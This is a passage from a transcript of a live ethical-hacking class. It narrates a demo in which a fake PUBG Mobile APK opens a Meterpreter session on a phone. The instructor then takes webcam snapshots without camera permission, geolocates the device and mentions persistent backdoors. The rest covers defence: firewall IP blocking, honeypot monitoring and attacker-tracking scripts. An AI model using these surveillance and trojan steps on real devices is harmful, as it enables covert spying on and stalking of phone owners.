up. He'll just open it up, right? So I don't want to open it up this using this. I'll just open it up using downloads or something. So I'll just go over here, CS File Explorer, downloads, and we have PUBG Mobile here. So right, so just click on this PUBG Mobile. So game installer, always install. So watch on the black screen what happens. Install anyway. So app installed and open it up. Open it up. So see here we got a Meterpreter cell. Now we are onto this cell phone, right? So if you want to, just showing you something over there. So if you want to just grab up a picture, so type in your question mark, you will get all the what do you say, options that all the options that you can type in. So one of them is webcam snap. So just type in here webcam. Webcam underscore snap, I guess. Yes, webcam underscore snap. So this takes up a picture, like screenshot. This is webcam snap. So got the frame. So the frame is saved in this location /root/this, right? So I'll just open up WinSCP once again. So WinSCP once again. And new session. So okay, so the IP address, just I'll grab it from here. Right click, copy. And username is root. Password is 1, 2, 3, 4 and 3. So this file is being created as of now. So I'll just bring this file cp something over here into my system. It's copied. So let's go to this system over there in D drive, and this cp file, where is it? Refresh it once again. So did I copy it properly? Where did it go? I'll just take up once more webcams now. Webcam snap once again. I just missed that file. I might have dumped it somewhere else in a hurry. So it's saved over there. Okay. So just refresh this one. You'll get one more file over here. So this is here, and this is here. So this is the newer file, I guess. Yes, VM. Yes, these are two other newer files. So this one, and it has to be copied over there to this system over there in this place. Yes. So no such files or directory. So somebody is poking. You know what? Somebody is poking. Somebody is poking. You got my password. Somebody is poking. This is very bad. This is very bad. Somebody is poking. Now let's see. I just uttered the password and somebody poked it from there. Okay, no problem. I just changed the password. Okay, so I'll just do a webcam snap once again. So you can very well see that this is the snapshot, right? We can geolocate where is this location. Like if I just type in here question mark, if I can geolocate this guy. So where is the geolocation command? So the geolocation command is here. Van geolocate and geolocate. So geolocate. So just type in here geolocate. Geolocate. So I got his geolocation. So see, this is his latitude and this is longitude. You can put this latitude and latlong.com is get the website, I guess. So let's see if this is the website. Latlong.net. Yes. You put up this latitude and longitude, you'll get the information where exactly the cell phone is located. Longitude. It didn't work out properly. So we have to find up some other solution. 81.37, 49, something like that. So let's see. So I guess that guys, you understood that what is the concept behind hacking up a Windows system and hacking up a Linux system in there. So this is what was there in today's session. So if you have any questions, please put up. I'm just deleting this machine in the meantime. And this was at what do you say? This cell phone exactly shows this in the form of main activity. So if you just want to see this one shows you as main activity. So this one, right? So this one, the main activity here, right? So if you just click on this one and drag and drop it, it's gone. So being it like main activity, no, people will not try to just exactly what do you say, poke into that application altogether. And even you have got backdoors. If you just YouTube something, YouTube over there, and type in something like create persistent connection, persistent persistent connection, Android, or Android Metasploit, Metasploit, M-E-T-S-P-L-O-I-T, and Metasploit. So you will get a whole lot of how to hack an Android with persistent for lifetime using this one. So you will particularly require some sort of coding for that. It will not work directly, in fact. Okay, so let's take some questions. It is time for questions now. So please bring up that cam here. So I am unable to see the chat. Wait a second. Yes. ISP can see my hacking activities. Correct. Ravitej, ISP can see my activities even if I am using VPN. Is it possible to create a program that generates IP address or can act like a VPN? It is not. I am not a developer, so I will not be able to create a program. Rather, I have got certain applications that will act like a VPN proxy for me, and we can switch proxy altogether. So the next session, what is the next session about? So the next session is about SQL injection and session hijacking. AG, without giving camera permission, how did it capture? So that is what an exploit does. This is what is called exploitation. I think you can use virtual card, Lucifer. Yes, Lucifer, it might support virtual debit card. I'm not sure about debit card, but it accepts credit card. People have started telling me that debit cards information not is not supported anymore, right? So if debit card is not supported anymore, I just cannot say that debit card is supported. Metapreter handling now is done through GUI as well. So we have got Metasploit GUI there in the market now. Harish. Harish, if you Harshish, Harsh, we can hack without cloud, but you will be able to hack machines only on the LAN or Android on the LAN. Nothing is reported to Google. Google's privacy statement says that your whatever you do with your virtual machines, they will not exactly penetrate into your machines and see what exactly you are doing. Yes, the hack same exploit works on Windows 10 as well. With persistent connection, AG, yes, still a hacker can have access to your. So what he will do, he'll plant, and once he hacks your system, he'll again replant another exploit behind something and hide that icon, so that even if you delete that main activity, something remains in your system. Manoj Kamal, what is ADB? I didn't understand. What do you mean by ADB? Can you write the full form in there? And how to make payload for iOS? Creating payload for iOS is not that easy. You Google that out. In ethical hacking, at least we don't have creating payloads for iOS. In GCP, you cannot use Kali. Kali is a collection of tools, right? So you can use the same collection of tools over there in cloud using different machines. Like Metasploit was not available, so I installed up Metasploit. Got that, Hardik Devan? We cannot use Kali over there, but we can use Kali tools. We have to install Kali tools. Yes, Philip has a nice question. Alex Philip, any security can you provide for avoiding these attacks? So let me share my screen and show you that how many live attacks are going on into my data center as of now, right? So please stop my cam. So I'm taking you to my data center wherein you will be able to see the live attacks. So if you can see that these are the live attacks that is going on to this IP address. So these all are the IP addresses. So if you can just see over here. So where is my pen? Give me a second. Give me a second. I'm coming with my pen. So you can see all the remote IPs in there. You can see all these remote IPs. Yeah, yeah. All these remote IPs. These are all doing some malicious activity on these ports, right? These ports. So I can just either block this IP address, or I can just block this port, or I can do both the tasks, right? So you should have some tool like Honeybot and all. So there is a tool particularly which is called Honeybot. So Honeybot is online or live doing live tracking of malicious activities. So it's in fact not doing only malicious activity, it's trying to find out that who all are penetrating onto what port over there, right? So this I okay, let's see, say that I want to block one IP address. Well, let's take one IP address which is very common in there. So this guy 49 is penetrating so many times, isn't it? So let's note down his IP address first of all. So 49.88.112.76. Now let's block his traffic over there, because this guy is trying to access my port number 22. So this guy, you can see that this guy is trying to access my port number 22 here. So port number 22 is for SSH. So I'll just block port number. I cannot block port number 22 because I have to be there. Okay, so just redo it. Sorry. So I will have to just be accessible to that port number 22 because I need that. So what I'll do is that I'll open up firewall. I'll create up a new rule, and I'll just create up a new rule for custom rule over there. So click on this and all programs. So protocol is any, click on next, and which remote IP addresses do I want to block? So click on this and add this IP address. So what is the IP address? 49.88.112.76. And this you can do programmatically even if you know PowerShell scripting, right? And I am just typing in here block and the IP address. Let any block IP. Oh, very bad guy. So you can just name it anything. So click on this, and now let's watch that what happens to his activity. So let's see. Let's watch for 1 minute. So is there any activity from that guy? So I should not see any packets coming from that guy anymore. So my firewall should drop his packet. So they see the number of live attacks going on. Can you imagine this? So that guy is gone now. So he'll have a lollipop. I'll just stop it and start it once again, so that you feel it that it will. So it will start from after 8:46 itself. I'll just stop and start it once again. So I'll start it on adapter number this and click on. The records are being saved. So the activity has stopped. So there is no traffic coming in, at least not from that guy. So there are traffics coming in, but not from that guy. That guy tried to penetrate into my system quite often. So 112.76. Okay, so I hope that you understood how to exactly block up somebody's. Okay, where was I? Yes, here. Just put it. Any solutions for removing exploits in our phone? So don't exactly entertain to any malicious, you can say, IP addresses or malicious websites. Don't check spam mails or don't click on any hyperlinks that you exactly don't know. This is one of the way to save. Yes, Honeybot is free of cost, Santosh. So, Bhavan, I will again be able to find out that if he changes. Bhavan Goda, if he changes his IP and attacks, okay, fine, attack me. Then I'll again block his new IP address and I'll create, in fact, a script to find out that who is attacking over there with a different. So I'll create a script like this, that if some malicious traffic comes from any IP address and it comes over there for 5 times consecutively, so then block this IP address. So I'll create a script like this in PowerShell, but I haven't done it in my data center because I have to teach people to see that these are the live attacks. But we can actually do this sort of thing. You know what antivirus blocking? You want to see antiviruses? Wait a second. Let me show you that what is the status of antiviruses. Antiviruses are being evaded here. See here. The antivirus status is completely red. You see that? The last day it has blocked access protection was there are 5 access protections over there. Right. And one more thing. So let me see if I can check the logs. Open access protection log file. So if you can see the log file, just let me make it a bit small in here. Font, I'll just make it a bit larger. Don't worry. I'll just make it a bit small for the time being. What happened? So you can see here that I have got some traffic being terminated, action block terminate. So you can just see that people are trying to poke into my antivirus even, and I am getting some action blocked over there, right? So if you just scroll down, you'll be able to find the IP addresses even some at some place. Okay, here. So can you see this? Here we go. So can you see this here? These are the IP addresses, in fact. So who are trying to poke into my antivirus using port number 6666. So even antiviruses are not that protected. Antiviruses can be evaded. So that is why it is red. It's just crying. My antivirus is crying. Can you see that? Red is gone. I just saw the logs and antivirus was crying that somebody is trying to poke into his nose and get the things penetrated. You have to create persistent connection. Dheeraj, you have to script and create a persistent connection. If it is hacked for once, it is hacked for only once. If it deletes that particular exploit, then it is gone. Yes, hack can happen using port forwarding. Abhishek, hack can happen using port forwarding. Br- br- Burgess, I didn't get your question. Hacker is, sir, is hacker is location change in computer IP address. I didn't get your question properly. To learn Google Docs, come to my premium classes, Brajesh. Google Docs is a way to use Google to find out certain exploits, certain URLs, certain PDFs and all. Omkar, how can find hacker who is the attacker? So for that, I have got a whole hell lot of script in there. I'll just show you. Wait a sec. SSH and www root at www.thirditech.net. So what is it? Yes, cat slash 50 slash the underscore back. So this is a full-fledged script. So right from here, slash exclamation mark slash bin slash bash till this place. It's designed to find out who attacked into my system, from which IP address, from which country. If you want to see the reports is compiled over here at this place. You can use even on your system over there. www.thirditech.net slash reports. This is day wise report that you have got that who exactly attacked into the system. So let's see last day's report. 29 on 29th we'll get a report of 28th. So 29 8. So this you were attacked by all IP addresses from the following countries on August 28th. So it was right. These are the codes of the countries. So you can obviously type in their CN and find the country code over there. So how many attacks were there? Let's see. So there were 14,699 attacks last day from these countries and the IP addresses. So particularly you have to write in a script for that. This whole script is doing this task. So Leela, anybody can learn hacking provided you should have a zeal and a bit of networking experience in there. So you should understand networking, in fact. Alex, I don't have much idea about how this Zoom can be hacked. Yes, Shanu, I'm about to finish it off. Just give me 2 more minutes. I know that. So how did you like the class? Rate today's class, guys. Rate today's class on the scale. Oh, give me a second. Give me a second. Give me a second. Give me a second. I've sent something on chat. Please look at that. Give a score on the scale of 5. Today we don't have any assignment, Amol. I'll give you assignment tomorrow. Prasnik Das, I am not a hacker by profession. I am a pen tester. Oh, Hatish gave me Satish Gupta. You gave me 6 out of 5. Thank you. Thank you so much. Literally, thank you so much. Exploit. If you don't type exploit hyphen jz, you can type exploit. So jz is to retain up the session. So exploit is to exploit it. That means just poke into the system. You mean to say exploit. Okay, guys, it's 21:00 hours. Thank you so much for being with me. I hope that this has been informative for you, and we'll be right back tomorrow. Till then, namaskar, shubharatri, shabba khair.
Thank you, sir. Thank you, everyone. Guys, there is a guest lecture that has been scheduled tomorrow. So please join that guest lecture and we'll have a normal lecture as well. Same time tomorrow. Thank you for joining the lecture.